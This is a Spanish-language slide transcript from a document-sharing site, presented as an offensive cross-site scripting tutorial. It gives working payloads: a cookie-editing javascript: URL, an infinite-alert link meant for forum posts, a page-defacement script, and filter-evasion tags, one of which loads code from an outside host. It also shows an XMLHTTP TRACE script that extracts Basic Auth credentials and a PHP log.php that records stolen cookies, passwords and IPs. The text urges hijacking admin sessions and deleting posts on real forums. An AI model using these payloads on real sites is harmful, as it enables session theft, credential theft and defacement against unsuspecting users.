XSS Cross- site scripting

All materials on our website are shared by users. If you have any questions about copyright issues, please report us to resolve them. We are always happy to assist you.
 13 views
of 10

Please download to get full document.

View again

Description
XSSCross-site scriptingQUE ES? Es un ataque basado en la explotación de vulnerabilidades de el sistema de validación de HTML incrustado.El problema es que normalmente…
Share
Transcript
XSSCross-site scriptingQUE ES? Es un ataque basado en la explotación de vulnerabilidades de el sistema de validación de HTML incrustado.El problema es que normalmente no se valida correctamente, esta vulnerabilidad puede estar de forma directa (foros, mensajes de error, etc..) o indirecta (redirecciones, framesets, etc..)cada una se trata de forma diferenteTIPOS
  • Directa:
  • Este tipo de XSS, es el que normalmente es censurado, asi que es muy poco comun que puedas usar tags como <script o <iframe, sin embargo nunca es malo probar, para ver formas de pasar estas protecciones, debes de saber mas de HTML que el creador del sitio.
  • Indirecta:
  • Esta es un tipo de vulnerabilidad, muy común, y muy poco explotada, consiste en modificar valores que la aplicación web utiliza para pasar variables entre 2 paginas, sin usar sesiones.INDIRECTA Esta sucede cuando hay un mensaje o una ruta en la URL del navegador o en la cookie. para saber el contenido de una cookie, sin usar ningún tipo de iecv o addin(complementos de aplicaciones) para tu navegador, puedes usar el siguiente script, solo colocalo en la barra de direcciones, y presiona Enter.Código:javascript:void(document.cookie=prompt("Modifica el valor de la cookie",document.cookie).split(";")); una vez dentro podras modificar la cookie a tu antojo, si pones cancelar la cookie se borrará. ahora, que podemos ver con este ejemplo?Repuesta: que podemos meter comandos javascript solo modificando una URL como puedes aventajarte de esto?INDIRECTA CON FrameSet iniciando el ejemplo de el frameset, que segun la pagina que coloques te crea un frame a esa pagina.que pasara si pones, en esa URLCódigo:javascript:while(1)alert("Te estoy robando"); y el link, lo pones en un foro. ¿Qué puede pasar?¿De que otras formas podemos evolucionar este ataque?como ejemplo : pones un script que tome una cookie, y mande un mensaje privado a el administrador, o incluso, que borre todos tus post en X foro, todo esto se puede.. podemos aprovechar en la web los sites con mas vulnerabilidades de estos ataques que son los sitios de descarga, que colocan en la misma url, el sitio de objetivo… estas son vulnerables a ataques XSS indirectos y directos . osea, puedes colocar una imagen con link al sitio malicioso, y se ejecuta, sin que el usuario lo sepa. Incluso se puede borrar un post en phpBB, o hacerte admin.MENSAJES PERSONALIZADOS DE TIPO INDIRECTAEstas, son forzosamente para links, no funciona en imágenes ,y se da de esta forma:Código:error.php?error=Usuario%20Invalido esa pagina, es vulnerable a XSS Indirecto.con esto puedes meter casi lo que sea ahi dentro.un <script> que te cree otra sesion bajo otro usuario, y tu sesion actual la mande a el atacante.Al tener esta vulnerabilidad el site se puede modificar practicamente todo el codigo de un sitecon este codigo, se borra todo el contenido de la pagina, y escribe otra cosa:Código: <script>document.documentElement.innerHTML="DEFACED";</script>DIRECTA Código: <BR SIZE="&{alert('XSS')}"><FK STYLE="behavior: url(http://ha.ckers.org/xss.htc);"><DIV STYLE="background-image: url(javascript:alert('XSS'))"> Style es MUY facil de usar, y muchos filtros son vulnerables.Usted cree que se puede meter algo en este a primera vista, pues ya ven.. si se puede, logicamenteno se incrusta todo en el espacio que se tiene, se puede usar:Código:eval(this.fu)y en el div, agregar un campo "fu" con el codigo<div fu="alert('Hola');" STYLE="background-image: url(javascript:eval(this.fu))">DIRECTA CON AJAXSS Se basa en usar cualquier tipo de vulnerabilidad para introducir un objeto XMLHTTP y desde ahi enviar contenido POST, GET, etc.. automaticamente, sin conocimeinto del usuario, un Bug de XSS, usando esta tecnica en MySpace de MSN, permitio que una persona, lograra tener mucha fama (y es que pudo haber hecho cosas malas, afortunadamente solo hizo esto)El potencial de este tipo de ataque es infinitamente alto, parece ser que tiene un futuro prometedor.El siguiente script obtiene el valor de las cabezeras de autenticacion de un sistema basado en Basic Auth. solo habria que decodificarlo, pero es mas facil mandarlo codificado a tu log de contraseñas, la codificacion es base64.Código:varxmlhttp=new ActiveXObject("Microsoft.XMLHTTP");xmlhttp.open("TRACE","./",false);xmlhttp.send();str1=xmlhttp.responseText;splitString = str1.split("Authorization: Basic ");str2=splitString[1];str3=str2.split("Cache");alert(str3);ARCHIVO LOG.PHP log.php para registrar cookiesCódigo: <?php$archivo = fopen('log2.htm','a');$cookie = $_GET['c'];$usuario = $_GET['id']; $ip = getenv ('REMOTE_ADDR');$re = $HTTPREFERRER;$fecha=date("j F, Y, g:i a");fwrite($archivo, 'USUARIO Y PASSWORD: '.base64_decode($usuario).'Cookie: '.$cookie.'Pagina: '.$re.' IP: ' .$ip. ' Fecha y Hora: ' .$fecha. '</hr>');fclose($archivo);?>GRACIAS
    Related Search
    We Need Your Support
    Thank you for visiting our website and your interest in our free products and services. We are nonprofit website to share and download documents. To the running of this website, we need your help to support us.

    Thanks to everyone for your continued support.

    No, Thanks
    New Fashion Love Heart Painted Phone Case For iphone 5S 6 7 8 Plus Couples Case | The X Factor UK S12E16 720p HDTV x264-FTP [eztv] | One Piece 521